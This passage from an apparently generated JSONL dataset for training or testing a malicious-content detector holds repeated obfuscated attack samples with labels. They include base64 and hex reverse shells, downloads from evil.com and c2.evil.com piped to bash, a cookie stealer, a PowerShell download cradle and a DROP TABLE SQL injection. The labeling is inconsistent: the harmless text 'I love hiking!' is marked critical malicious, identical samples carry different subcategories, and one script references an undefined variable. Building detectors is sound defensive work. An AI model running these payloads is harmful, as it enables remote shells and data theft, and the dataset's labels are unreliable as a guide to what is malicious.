I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00295", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00296", "source": "hard_negatives", "source_license": "generated", "text": "[2022-04-22 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00297", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00298", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00299", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00300", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00301", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00302", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00303", "source": "hard_negatives", "source_license": "generated", "text": "var _0x5be3=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x08d3[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00304", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.2c08db91.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00305", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00306", "source": "hard_negatives", "source_license": "generated", "text": "[2023-09-24 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00307", "source": "hard_negatives", "source_license": "generated", "text": "[2023-05-19 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00308", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00309", "source": "hard_negatives", "source_license": "generated", "text": "var _0xc290=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x4454[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00310", "source": "hard_negatives", "source_license": "generated", "text": "[2020-01-04 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00311", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00312", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00313", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00314", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00315", "source": "hard_negatives", "source_license": "generated", "text": "[2023-01-25 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00316", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00317", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00318", "source": "hard_negatives", "source_license": "generated", "text": "[2026-01-22 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00319", "source": "hard_negatives", "source_license": "generated", "text": "var _0x7d67=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x4e74[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00320", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00321", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.9cf8a739.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00322", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.29dbcdfb.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00323", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00324", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00325", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00326", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.3b332a55.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00327", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.80be6f3e.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00328", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00329", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00330", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00331", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00332", "source": "hard_negatives", "source_license": "generated", "text": "[2024-12-11 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00333", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.b14a2a99.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00334", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00335", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00336", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00337", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00338", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00339", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00340", "source": "hard_negatives", "source_license": "generated", "text": "[2023-05-21 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00341", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00342", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00343", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00344", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00345", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.2187190f.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00346", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00347", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00348", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00349", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00350", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00351", "source": "hard_negatives", "source_license": "generated", "text": "[2022-06-05 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00352", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00353", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00354", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho 